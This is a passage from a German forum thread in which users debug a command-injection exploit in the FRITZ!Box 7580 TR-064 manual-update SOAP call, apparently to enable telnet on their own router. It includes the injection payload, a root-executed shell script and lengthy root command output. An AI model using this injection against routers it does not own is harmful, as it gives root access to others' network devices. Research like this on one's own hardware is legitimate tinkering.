    Wenn das "INTENSO" hingegen bereits ein eigenes Label sein sollte, dann schaut das für mich eher nach FAT32-Format aus (ist aber auch nur geraten anhand der kompletten Großschreibung des Labels) und auch wenn da m.W. beim Mounten entsprechende Flags emuliert werden (ich habe schon ewig keinen FAT32-Stick mehr an einer FRITZ!Box gehabt), würde ich eher auf ein "natives" Dateisystem für Linux setzen, wenn ich mich einer FRITZ!OS-Installation "unsittlich" näher wollte.

    Wobei man bei der 7580 natürlich auch komplett auf den USB-Stick verzichten könnte und das Skript gleich auf dem internen NAS-Speicher (unter /var/media/ftp direkt) ablegen könnte ... dann halt mit dem Risiko des Verlustes (sofern man keine Kopie an anderer Stelle hat), wenn man die Box irgendwie zurücksetzen muß. Da mir das bei irgendwelchen Experimenten häufiger mal so geht und dann immer die letzten Änderungen genau nicht gesichert waren, habe ich mir irgendwann mal das Arbeiten mit USB-Sticks angewöhnt ... für die reine Funktion des Aufrufs eines Shell-Skripts ist das hier aber nicht notwendig und der interne NAS-Speicher hätte dann mit dem YAFFS2 auch gleich ein Dateisystem, was Linux-Rechte "von Haus aus" unterstützt.
     
  17. pzYsTorM

    pzYsTorM Neuer User

    Registriert seit:
    20 Apr. 2017
    Beiträge:
    7
    Zustimmungen:
    0
    Punkte für Erfolge:
    0
    Vielen Dank nochmal für deine Tipps und Denkanstöße.
    Ich war nun gerade eine Woche im Urlaub - daher gehts jetzt erst weiter mit dem Testen:

    Ich habe nun das invade.sh etwas umgebaut: Es besteht lediglich aus einem
    Code:
    echo 'ok' > /var/media/ftp/ok.txt
    Der USB-Stick ist nun erstmal nicht mehr mit im Spiel.

    Leider wird auch diese ok.txt nicht erzeugt...

    Nochmal ne Frage an Dich:
    Weißt du, ob die Box Internetzugang braucht, während dieses "manuellen Updatevorgangs"?
    Meine 7580 ist noch quasi nagelneu und hat noch nie einen Zugang nach draußen gehabt.
    Daher hat die Box eben auch kein DNS und kann sich keine externen Files holen, wie beispielsweise das SOAP-Schema in deinem Powershell-Script:
    Code:
    $getinfo_query='<?xml version="1.0"?><s:Envelope xmlns:s="http:#schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http:#schemas.xmlsoap.org/soap/encoding/"><s:Body><u:X_AVM-DE_DoManualUpdate xmlns:u="urn:dslforum-org:service:UserInterface:1"><NewX_AVM-DE_DownloadURL>http://fritz.box/jason_boxinfo.xml$(' + $Command + ')</NewX_AVM-DE_DownloadURL><NewX_AVM-DE_AllowDowngrade>0</NewX_AVM-DE_AllowDowngrade></u:X_AVM-DE_DoManualUpdate></s:Body></s:Envelope>'
    # the specified URL doesn't matter ... it's only used to start a "httpsdl" instance, which contains the injected command in the URL field
    
     
  18. PeterPawn

    PeterPawn IPPF-Urgestein

    Registriert seit:
    10 Mai 2006
    Beiträge:
    11,875
    Zustimmungen:
    677
    Punkte für Erfolge:
    113
    Beruf:
    IT-Freelancer
    Ort:
    Berlin
    Internetzugang ist nicht erforderlich, weil die URL auch ins LAN zeigen darf.

    Ich habe keine Ahnung, was Du da am Ende falsch machst ... wenn ich in einer 153.06.81 nachschaue, ist da jedenfalls das Problem noch vorhanden und in der 153.06.83 ist es behoben.

    Wenn ich raten sollte, würde ich auf einen falschen Aufruf des Skripts auf dem NAS-Speicher tippen ... das sollte eben explizit über "/bin/sh" erfolgen, weil ansonsten andere Probleme (angefangen bei den Dateirechten, wobei der NAS-Speicher zumindest mal nicht mit "noexec" gemountet wird, wenn ich das richtig sehe in der "S15-filesys") auftreten können. Habe ich aber oben auch so beschrieben ... wenn Du Dein Vorgehen etwas ausführlicher beschreiben würdest, könnte man vermutlich auch erkennen, wo Du den Fehler machst - daß es an einem solchen von Dir liegt, stelle ich jetzt mal als These in den Raum, auch wenn ich das nur in der 06.81 nachgeschlagen habe und es damit (mangels Notwendigkeit) nicht selbst probiert habe.

    Abgesehen davon lautete meine Empfehlung doch (iirc), daß Du die URL auf einen lokalen Server ändern solltest (anstelle von "fritz.box"), wo Du den HTTP-Request dann verfolgen kannst (mit einem Netzwerk-Mitschnitt oder anhand des Logs dieses Servers), oder? Was ist denn dabei herausgekommen? Es ist ja sinnvoller, das Problem systematisch einzugrenzen und nicht einfach irgendwie solange zu probieren, bis es (mehr oder weniger zufällig) dann mal klappt.
     
  19. pzYsTorM

    pzYsTorM Neuer User

    Registriert seit:
    20 Apr. 2017
    Beiträge:
    7
    Zustimmungen:
    0
    Punkte für Erfolge:
    0
    Oh, das war mir nicht so klar. Jetzt, wo du es schreibst, erklärt das natürlich die ganze Sache.
    Als Command im Powershell-Script hatte ich immer:
    Command: /var/media/ftp/invade.sh
    Jetzt natürlich in
    Command: /bin/sh /var/media/ftp/invade.sh
    verändert... und es funktioniert...:D

    Der Telnet-Zugang ist jedoch weiterhin nicht verfügbar. Es kommen bei PuTTY zwei Meldungen ein paar Sekunden nach dem versuchten Verbindungsaufbau: "Connection closed by remote host" und danach "Network error: Connection refused"

    Ich wollte dann ein bisschen weiter debuggen und habe in dein invade.sh Script am Anfang und am Ende ein echo foo > /var/media/ftp/ok1.txt bzw. am Ende nach ok2.txt eingefügt. Nachdem dieses Script dann wieder ausgeführt wurde, habe ich per FTP gesehen, dass beide Dateien ok1.txt und ok2.txt angelegt wurden. Sie lassen sich jedoch per FTP nicht herunterladen. Auch per Fritz!NAS nicht.
    Beim FTP-Client gibts ein "550 ok1.txt: No such file or directory", obwohl ein FTP Directory Listing das zeigt:
    Code:
    -rw-rw-rw- 1 ftp ftp 986 Jan  1 01:02 invade.sh
    -rw-r--r-- 1 ftp ftp 4 Jan  1 01:02 ok1.txt
    -rw-r--r-- 1 ftp ftp 4 Jan  1 01:02 ok2.txt
    Gut, ich dachte, es liegt vielleicht an Unix-Dateirechten und habe dann eine neue Datei out.txt per FTP angelegt und in das invade.sh Script am Anfang ein echo "start" >> /var/media/ftp/out.txt und am Ende ein echo "stop" >> /var/media/ftp/out.txt notiert.

    Logge ich mich nun per FTP auf die FritzBox, habe ich nun sogar zwei Dateien, die gleich heißen:
    Code:
    -rw-rw-rw- 1 ftp ftp 2 Jan  1 01:08 out.txt
    -rw-r--r-- 1 ftp ftp 11 Jan  1 01:09 out.txt
    Sehr merkwürdig.
    Herunterladen kann ich nur die 2-Byte Datei, die ich per FTP erstellt habe. Die 11-Byte Datei mit "start/stop"-Inhalt (9 Byte + 2 Umbrüche vom Echo) lässt sich nicht angucken.

    Per invade.sh Script ein rm /var/media/ftp/out.txt funktioniert jedoch wieder und die vom Script erstellte Datei ist weg, sodass nur noch meine per FTP händisch erstellte Datei out.txt übrig bleibt, die ich dann auch wieder per FTP löschen kann.

    Kannst Du dieses Verhalten erklären?

    Richtig, hätte ich gemacht, sobald ich hier nicht weiterkomme. Das Debuggen mit Unix-Commands war nun für mich einfacher als das Sniffen von Traffic. Bin gerade umgezogen und habe meinen Linux-PC noch nicht ausgepackt.

    - - - Aktualisiert - - -

    Arg... Sorry... Windows-Zeilenumbrüche waren Schuld. Die Datei-Problematik hat sich nun erledigt. Teilweise hatten die Dateien noch ein Umbruch hinten dran... Deswegen wurden sie nicht gefunden... etc.

    Langer Rede kurzer Sinn. Telnet klappt immernoch nicht. Aber zumindest kann ich nun weiter debuggen.
     
  20. pzYsTorM

    pzYsTorM Neuer User

    Registriert seit:
    20 Apr. 2017
    Beiträge:
    7
    Zustimmungen:
    0
    Punkte für Erfolge:
    0
    Tja, also es geht weiter... schleppend... bzw. leider erfolglos...
    Inzwischen weiß ich, dass das invade-Script aufgerufen wird.
    Leider ist Port 23 (und auch Port 514) nicht auf.
    Ich habe dann die Möglichkeit genutzt, um ein paar weitere Details von der Fritzbox zu erfahren und zu gucken, woran es scheitert.

    Am Ende des invade.sh Scripts habe ich dafür Folgendes angehängt:

    Code:
    ps > /var/media/ftp/test-ps.txt
    ls -al /bin > /var/media/ftp/test-bin.txt
    ls -al /var > /var/media/ftp/test-var.txt
    ls -al /usr/bin > /var/media/ftp/test-usrbin.txt
    ls -al /usr/sbin > /var/media/ftp/test-usrsbin.txt
    netstat -an > /var/media/ftp/test-netstat.txt
    cat /var/tmp/inetd.conf > /var/media/ftp/test-inetd.txt
    cat /var/start_telnet > /var/media/ftp/test-start.txt
    id > /var/media/ftp/test-id.txt
    cat /proc/devices > /var/media/ftp/test-proc.txt
    sed -ne 's|^[ ]*\([0-9]*\)[ \t]tffs.*$|\1|p' /proc/devices > /var/media/ftp/test-sed.txt 
    Ich verstehe nicht so wirklich, waum Du ein tar-Archiv auf dem node c 245 29 erzeugst...
    Daher poste ich hier einfach mal die Outputs der o.g. Befehle.
    Magst Du mal durchgucken und hast vielleicht ne Idee, woran es scheitert?
    Bislang gibt es auf jeden Fall noch keinen /usr/sbin/telnetd Symlink und daher auch kein Port 23.

    Dies sind die Outputs:

    ps:
    Code:
      PID USER       VSZ STAT COMMAND
        1 root      1524 S    init
        2 root         0 SW   [kthreadd]
        3 root         0 SW   [ksoftirqd/0]
        5 root         0 SW<  [kworker/0:0H]
        6 root         0 SW   [kworker/u8:0]
        7 root         0 SW   [migration/0]
        8 root         0 SW   [rcu_bh]
        9 root         0 SW   [rcu_sched]
       10 root         0 SW   [migration/2]
       11 root         0 SW   [ksoftirqd/2]
       13 root         0 SW<  [kworker/2:0H]
       15 root         0 SW   [kworker/0:1]
       18 root         0 SW   [kworker/2:1]
       19 root         0 SW<  [khelper]
       20 root         0 SW   [kdevtmpfs]
       21 root         0 SW   [kworker/u8:1]
      212 root         0 SW<  [writeback]
      214 root         0 SW<  [bioset]
      216 root         0 SW<  [kblockd]
      228 root         0 SW   [khubd]
      261 root         0 SW<  [rpciod]
      267 root         0 SW   [kswapd0]
      268 root         0 SW   [fsnotify_mark]
      269 root         0 SW<  [nfsiod]
      272 root         0 SW<  [xfsalloc]
      273 root         0 SW<  [xfs_mru_cache]
      274 root         0 SW<  [xfslogd]
      275 root         0 SW<  [crypto]
      306 root         0 SW   [pm_info]
      313 root         0 SWN  [avm_debugd]
      314 root         0 SW<  [ICCWQ0]
      315 root         0 SW<  [ICCWQ4]
      316 root         0 SW<  [ICCWQ2]
      427 root         0 SW   [tffsd]
      428 root         0 SW<  [deferwq]
      439 root         0 SW   [ubi_bgt0d]
      528 root         0 SW   [cleanup_timer_f]
      682 root         0 SW   [ubifs_bgt0_3]
      698 root         0 SW<  [capi_pipew]
      699 root         0 SW<  [capi_schedw]
      700 root         0 SW   [pcmlink_ctrl/0]
      701 root         0 SW<  [kworker/0:1H]
      702 root         0 SW   [capitransp]
      703 root         0 SW   [kworker/0:2]
      708 root         0 SW<  [avm_dect_thread]
      801 root      1168 S    /sbin/udevd --daemon
      823 root         0 SW   [ppa_rt_chk_hit_]
      850 root      1520 S    tail -f /nohup.out
     1013 root      1124 S    /sbin/udevd --daemon
     1307 root         0 SW<  [kworker/2:1H]
     1330 root      3364 S    avmipcd
     1584 root      4620 S    dsl_monitor -d
     1807 root      4108 S    l2tpv3d
     1817 root     19348 S    ctlmgr
     1831 root      5532 S    multid
     1890 root      3688 S    pcpd
     1894 root      4144 S    upnpdevd
     1904 root      7152 S    wland -B
     2002 root         0 SW<  [alloc_task_wque]
     2015 root      5524 S    dsld -i -n
     2106 root         0 SW   [kworker/2:2]
     2169 root      2124 S    /usr/bin/boxnotifyd
     2180 root      1532 S    sh /etc/init.d/rc.ovh_control.sh dynamic
     2193 root      1004 S    /bin/run_clock -c /dev/tffs -d
     2203 root      1524 S    init
     2228 root         0 SW<  [alloc_task_wque]
     2275 root      1168 S    /sbin/udevd --daemon
     2282 root      2020 S    hostapd -B -g /var/run/hostapd/global
     2288 root      2220 S    wpa_supplicant -B -g /var/run/wpa_supplicant/global
     2293 root      1600 S    /sbin/lbd
     2777 root      5816 S    {tr069fwupdate} $ fw http://fritz.box/jason_boxinfo.
     2851 root         0 SW   [kworker/0:0]
     2903 root      1512 S    sleep 10
     2968 root      1524 S    sh -c httpsdl -O - "http://fritz.box/jason_boxinfo.x
     2969 root      1524 S    sh -c httpsdl -O - "http://fritz.box/jason_boxinfo.x
     2970 root      5756 S    /usr/www/cgi-bin/firmwarecfg stream
     2971 root      1516 S    tar xvf -
     2972 root      1532 S    /bin/sh /var/media/ftp/invade.sh
     2984 root      1520 R    ps 
    /bin:
    Code:
    drwxr-xr-x    2 root     root          2546 Jan 25  2017 .
    drwxr-xr-x   15 root     root           274 Jan 25  2017 ..
    -rwxrwxrwx    1 root     root          7964 Jan 25  2017 aicmd
    -rwxrwxrwx    1 root     root          9464 Jan 25  2017 allcfgconv
    -rwxrwxrwx    1 root     root            42 Jan 25  2017 ar7cfgchanged
    -rwxrwxrwx    1 root     root          9120 Jan 25  2017 ar7cfgctl
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 ash -> busybox
    -rwxrwxrwx    1 root     root           344 Jan 25  2017 aurachanged
    -r-xr-xr-x    1 root     root         11244 Jan 25  2017 auracntl
    -r-xr-xr-x    1 root     root         37984 Jan 25  2017 aurad
    -r-xr-xr-x    1 root     root        231520 Jan 25  2017 avmike
    -rwxrwxrwx    1 root     root          5068 Jan 25  2017 avmipc_send_event
    -rwxrwxrwx    1 root     root         17620 Jan 25  2017 avmipcd
    -rwxrwxrwx    1 root     root         12284 Jan 25  2017 base64
    -rwxrwxrwx    1 root     root         37644 Jan 25  2017 bntest
    -rwxrwxrwx    1 root     root          2017 Jan 25  2017 boxfeaturedisable
    -rwxrwxrwx    1 root     root        595568 Jan 25  2017 busybox
    -rwxrwxrwx    1 root     root          2816 Jan 25  2017 captive_portal_upload_image
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 cat -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 chgrp -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 chmod -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 chown -> busybox
    -rwxrwxrwx    1 root     root        127812 Jan 25  2017 cjpeg
    -r-xr-xr-x    1 root     root         12204 Jan 25  2017 configd
    -rwxrwxrwx    1 root     root          6112 Jan 25  2017 conv2utf8
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 cp -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 date -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 dd -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 df -> busybox
    -rwxrwxrwx    1 root     root           265 Jan 25  2017 dhcpcipchanged
    -rwxrwxrwx    1 root     root        143716 Jan 25  2017 djpeg
    -rwxrwxrwx    1 root     root         52280 Jan 25  2017 dmesg
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 dnsdomainname -> busybox
    -rwxrwxrwx    1 root     root           234 Jan 25  2017 dslinfodata
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 echo -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 egrep -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 false -> busybox
    -rwxrwxrwx    1 root     root         29976 Jan 25  2017 ffmpegconv
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 fgrep -> busybox
    -rwxrwxrwx    1 root     root           234 Jan 25  2017 fwupdate_logger
    -rwxrwxrwx    1 root     root          4156 Jan 25  2017 getcons
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 getopt -> busybox
    -rwxrwxrwx    1 root     root          5632 Jan 25  2017 getprivkeypass
    -r-xr-xr-x    1 root     root         27148 Jan 25  2017 giftopam
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 grep -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 gunzip -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 gzip -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 hostname -> busybox
    -rwxrwxrwx    1 root     root          2741 Jan 25  2017 inetdctl
    -rwxrwxrwx    1 root     root           643 Jan 25  2017 inetdftp
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 iostat -> busybox
    -rwxrwxrwx    1 root     root         14904 Jan 25  2017 ipcs
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 kill -> busybox
    -rwxrwxrwx    1 root     root         69948 Jan 25  2017 led-ctrl
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 ln -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 login -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 ls -> busybox
    -rwxrwxrwx    1 root     root         10348 Jan 25  2017 luavar
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 mkdir -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 mknod -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 more -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 mount -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 mpstat -> busybox
    -rwxrwxrwx    1 root     root          7528 Jan 25  2017 msgsend
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 mv -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 netstat -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 nice -> busybox
    -rwxrwxrwx    1 root     root        135752 Jan 25  2017 ntfs-3g
    -rwxrwxrwx    1 root     root           139 Jan 25  2017 onlinechanged
    -rwxrwxrwx    1 root     root         47724 Jan 25  2017 openssl_genrsa
    -rwxrwxrwx    1 root     root         71280 Jan 25  2017 openssl_req
    -rwxrwxrwx    1 root     root          8796 Jan 25  2017 pcplisten
    -rwxrwxrwx    1 root     root          8490 Jan 25  2017 picconv.sh
    -rwxrwxrwx    1 root     root         49804 Jan 25  2017 pictured
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 pidof -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 ping -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 ping6 -> busybox
    -rwxrwxrwx    1 root     root        145804 Jan 25  2017 playerd
    -rwxrwxrwx    1 root     root          4680 Jan 25  2017 playerd_tables
    -r-xr-xr-x    1 root     root         41496 Jan 25  2017 pngtopam
    -rwxrwxrwx    1 root     root          8812 Jan 25  2017 pnmcomp
    -rwxrwxrwx    1 root     root          8572 Jan 25  2017 pnmcut
    -rwxrwxrwx    1 root     root         21636 Jan 25  2017 pnmscale
    -rwxrwxrwx    1 root     root          6392 Jan 25  2017 prepare_fwupgrade
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 printenv -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 ps -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 pwd -> busybox
    -rwxrwxrwx    1 root     root          7896 Jan 25  2017 rdjpgcom
    -rwxrwxrwx    1 root     root          3337 Jan 25  2017 restorefonsettings
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 rm -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 rmdir -> busybox
    -r-xr-xr-x    1 root     root         11364 Jan 25  2017 rpctrl
    -rwxrwxrwx    1 root     root         12332 Jan 25  2017 run_clock
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 sed -> busybox
    -rwxrwxrwx    1 root     root          2972 Jan 25  2017 setfactorydefaults
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 setserial -> busybox
    -rwxrwxrwx    1 root     root          5084 Jan 25  2017 setsystz
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 sh -> busybox
    -rwxrwxrwx    1 root     root         45000 Jan 25  2017 showdsldstat
    -rwxrwxrwx    1 root     root         25240 Jan 25  2017 showfritznasdbstat
    -rwxrwxrwx    1 root     root          8648 Jan 25  2017 showinetstat
    -rwxrwxrwx    1 root     root         10488 Jan 25  2017 showl2tpstat
    -rwxrwxrwx    1 root     root          6772 Jan 25  2017 showopenports
    -rwxrwxrwx    1 root     root         15172 Jan 25  2017 showpainfo
    -rwxrwxrwx    1 root     root          1734 Jan 25  2017 showpcpinfo
    -rwxrwxrwx    1 root     root         11492 Jan 25  2017 showpcpitems
    -rwxrwxrwx    1 root     root          5428 Jan 25  2017 showshringbuf
    -rwxrwxrwx    1 root     root         19972 Jan 25  2017 showvoipdstat
    -rwxrwxrwx    1 root     root         11228 Jan 25  2017 slabparse
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 sleep -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 stat -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 stty -> busybox
    -rwxrwxrwx    1 root     root         34252 Jan 25  2017 supportdata
    -rwxrwxrwx    1 root     root           371 Jan 25  2017 supportdata.aha
    -rwxrwxrwx    1 root     root          2062 Jan 25  2017 supportdata.argo
    -rwxrwxrwx    1 root     root           471 Jan 25  2017 supportdata.avmnet
    -rwxrwxrwx    1 root     root           408 Jan 25  2017 supportdata.basis
    -r-xr-xr-x    1 root     root          1163 Jan 25  2017 supportdata.dect
    -rwxrwxrwx    1 root     root          4203 Jan 25  2017 supportdata.dsl
    -rwxrwx---    1 root     root          2904 Jan 25  2017 supportdata.plc
    -rwxrwxrwx    1 root     root          1341 Jan 25  2017 supportdata.tffs
    -rwxrwxrwx    1 root     root           997 Jan 25  2017 supportdata.usb
    -r-xr-xr-x    1 root     root          6828 Jan 25  2017 supportdata.wlan
    lrwxrwxrwx    1 root     root            20 Jan 25  2017 supportdata_argo.dsl -> /bin/supportdata.dsl
    -rwxrwx---    1 root     root          3667 Jan 25  2017 supportdata_argo.plc
    -rwxrwxrwx    1 root     root           673 Jan 25  2017 supportdata_argo.usb
    -r-xr-xr-x    1 root     root          2655 Jan 25  2017 supportdata_argo.wlan
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 sync -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 tar -> busybox
    -rwxrwxrwx    1 root     root          5628 Jan 25  2017 tcppeerlocation
    -rwxrwxrwx    1 root     root          5024 Jan 25  2017 testvalue
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 touch -> busybox
    -rwxrwxrwx    1 root     root         14776 Jan 25  2017 tr069starter
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 true -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 umount -> busybox
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 uname -> busybox
    -rwxrwxrwx    1 root     root            93 Jan 25  2017 update_led_off
    -rwxrwxrwx    1 root     root            91 Jan 25  2017 update_led_on
    -rwxrwxrwx    1 root     root          6844 Jan 25  2017 usbcfgconv
    -rwxrwxrwx    1 root     root         10368 Jan 25  2017 usbcfgctl
    -rwxrwxrwx    1 root     root           373 Jan 25  2017 usbhostchanged
    lrwxrwxrwx    1 root     root             9 Jan 25  2017 usermand -> usermand2
    -r-xr-xr-x    1 root     root         49600 Jan 25  2017 usermand2
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 vi -> busybox
    -rwxrwxrwx    1 root     root           208 Jan 25  2017 voipcfgchanged
    -rwxrwxrwx    1 root     root        186356 Jan 25  2017 voipd
    -rwxrwxrwx    1 root     root          5972 Jan 25  2017 webdavcfginfo
    -rwxrwxrwx    1 root     root           818 Jan 25  2017 wlancfgchanged
    -rwxrwxrwx    1 root     root         12786 Jan 25  2017 wlancfgconv
    -rwxrwxrwx    1 root     root         15547 Jan 25  2017 wlancfgctl
    -rwxrwxrwx    1 root     root          3632 Jan 25  2017 wlantimectrl
    lrwxrwxrwx    1 root     root             7 Jan 25  2017 zcat -> busybox 
    /var:
    Code:
    drwxr-xr-x   14 root     root          1740 Jan  1 01:07 .
    drwxr-xr-x   15 root     root           274 Jan 25  2017 ..
    -rw-r--r--    1 root     root           404 Jan  1 01:00 .CRWWLANMAP
    -rw-r--r--    1 root     root          3720 Jan  1 01:00 .SHMUSBDEVICES
    -rw-rw-r--    1 root     root         40000 Jan  1 01:06 .ar7events
    -rw-r--r--    1 root     root        180080 Jan  1 01:00 .dsld_statsimple
    -rw-r--r--    1 root     root            53 Jan  1 01:00 .igdd-del-portmap
    -rw-r--r--    1 root     root           216 Jan  1 01:00 .inetstat
    -rw-r--r--    1 root     root          8192 Jan  1 01:00 .srb_avm_reporting
    -rw-r--r--    1 root     root         12288 Jan  1 01:00 .srb_cloudmsgd
    -rw-r--r--    1 root     root          4096 Jan  1 01:00 .srb_dnsd
    -rw-r--r--    1 root     root         16384 Jan  1 01:00 .srb_invite
    -rw-r--r--    1 root     root          8192 Jan  1 01:00 .srb_l2tpv3
    -rw-r--r--    1 root     root         65536 Jan  1 01:00 .srb_log
    -rw-r--r--    1 root     root          8192 Jan  1 01:00 .srb_pcp
    -rw-r--r--    1 root     root         16384 Jan  1 01:00 .srb_sip
    -rw-r--r--    1 root     root         65536 Jan  1 01:07 .srb_sson
    -rw-r--r--    1 root     root          4096 Jan  1 01:00 .srb_voipbackup
    -rw-r--r--    1 root     root           108 Jan  1 01:00 .umtscfg
    -rw-r--r--    1 root     root          2836 Jan  1 01:00 .umtsstat
    -rw-r--r--    1 root     root            32 Jan  1 01:00 .var.tmp.cloudcds.log-crwlock
    -rw-r--r--    1 root     root            32 Jan  1 01:00 .var.tmp.msrv4.log-crwlock
    -rw-r--r--    1 root     root            32 Jan  1 01:00 .var.tmp.tcloud.log-crwlock
    -rw-r--r--    1 root     root        212380 Jan  1 01:00 .voipd_statsimple
    -rw-r--r--    1 root     root            32 Jan  1 01:00 CRWWLANMAP-crwlock
    lrwxrwxrwx    1 root     root            14 Jan  1 01:00 InternerSpeicher -> /var/media/ftp
    -rw-r--r--    1 root     root            32 Jan  1 01:00 SHMUSBDEVICES-crwlock
    lrwxrwxrwx    1 root     root            19 Jan  1 01:00 TZ -> /etc/default.049/TZ
    -rw-r--r--    1 root     root             1 Jan  1 01:00 USB-dev-bus-usb-001-001-hub
    -rw-r--r--    1 root     root             1 Jan  1 01:00 USB-dev-bus-usb-002-001-hub
    -rw-r--r--    1 root     root             1 Jan  1 01:00 USB-dev-bus-usb-003-001-hub
    -rw-r--r--    1 root     root             1 Jan  1 01:00 USB-dev-bus-usb-004-001-hub
    -rw-r--r--    1 root     root          6118 Jan  1 01:00 config.def
    lrwxrwxrwx    1 root     root            28 Jan  1 01:00 default -> /etc/default.Fritz_Box_HW225
    drwxr-xr-x    2 root     root            40 Jan 25  2017 dev
    lrwxrwxrwx    1 root     root            19 Jan  1 01:00 devices -> /var/tmp/usbdevices
    drwxr-xr-x    6 root     root           240 Jan  1 01:00 dsl
    -rw-r--r--    1 root     root            32 Jan  1 01:00 dsld_statsimple-crwlock
    -rw-r--r--    1 root     root           887 Jan  1 01:00 env
    -rw-r--r--    1 root     root          9790 Jan  1 01:00 env.cache
    drwxr-xr-x    2 root     root          1000 Jan  1 01:00 flash
    lrwxrwxrwx    1 root     root            31 Jan  1 01:00 flash.html -> /var/html/html/tools/flash.html
    lrwxrwxrwx    1 root     root            31 Jan  1 01:00 fx_moh -> /etc/default.049/fx_moh.default
    drwxr-xr-x    2 root     root            40 Jan  1 01:00 gcov
    lrwxrwxrwx    1 root     root            12 Jan  1 01:00 html -> /usr/www/avm
    lrwxrwxrwx    1 root     root            20 Jan  1 01:00 html.myfritz -> /usr/www.myfritz/avm
    lrwxrwxrwx    1 root     root            16 Jan  1 01:00 html.nas -> /usr/www.nas/avm
    lrwxrwxrwx    1 root     root            19 Jan  1 01:00 htmltext.db -> /etc/htmltext_de.db
    -rw-r--r--    1 root     root            32 Jan  1 01:00 igdd-del-portmap-crwlock
    -rw-r--r--    1 root     root            32 Jan  1 01:00 inetstat-crwlock
    -rw-r--r--    1 root     root           381 Jan  1 01:00 jason_boxinfo.xml
    -rw-r--r--    1 root     root           500 Jan  1 01:00 juis_boxinfo.xml
    -rw-r--r--    1 root     root             9 Jan  1 01:00 lanifaces
    -rw-r--r--    1 root     root             4 Jan  1 01:07 led
    drwxr-xr-x    2 root     root            60 Jan  1 01:00 lock
    drwxr-xr-x    2 root     root           160 Jan  1 01:00 log
    drwxr-xr-x    3 root     root            80 Jan  1 01:00 media
    lrwxrwxrwx    1 root     root            15 Jan  1 01:00 mediapath -> /var/media/ftp/
    -rw-r--r--    1 root     root            15 Jan  1 01:00 mountpoint_excluded_for_network
    -rwxrwxrwx    1 root     root          9222 Jan 25  2017 post_install
    drwxr-xr-x    2 root     root            80 Jan  1 01:07 rpc
    drwxr-xr-x    4 root     root           360 Jan  1 01:07 run
    -rw-r--r--    1 root     root            16 Jan  1 01:00 sem..SHMUSBDEVICES
    -rw-rw-r--    1 root     root            16 Jan  1 01:00 sem..ar7events
    -rw-r--r--    1 root     root            16 Jan  1 01:00 sem..igdd-del-portmap
    -rw-r--r--    1 root     root            16 Jan  1 01:00 sem..inetstat
    -rw-r--r--    1 root     root            16 Jan  1 01:00 sem..srb_avm_reporting
    -rw-r--r--    1 root     root            16 Jan  1 01:00 sem..srb_dnsd
    -rw-r--r--    1 root     root            16 Jan  1 01:00 sem..srb_l2tpv3
    -rw-r--r--    1 root     root            16 Jan  1 01:00 sem..srb_log
    -rw-r--r--    1 root     root            16 Jan  1 01:00 sem..srb_pcp
    -rw-r--r--    1 root     root            16 Jan  1 01:07 sem..srb_sson
    -rw-r--r--    1 root     root            16 Jan  1 01:00 sem..srb_voipbackup
    -rw-r--r--    1 root     root            16 Jan  1 01:00 sem..umtscfg
    -rw-r--r--    1 root     root            16 Jan  1 01:00 sem..umtsstat
    -rw-r--r--    1 root     root            16 Jan  1 01:00 sem.Changelist_Sema
    -rw-r--r--    1 root     root            16 Jan  1 01:00 sem.notifyd
    -rw-r--r--    1 root     root            16 Jan  1 01:00 sem.ontel
    -rw-r--r--    1 root     root            29 Jan  1 01:00 signal.EXIT
    -rw-r--r--    1 root     root           414 Jan  1 01:07 start_telnet
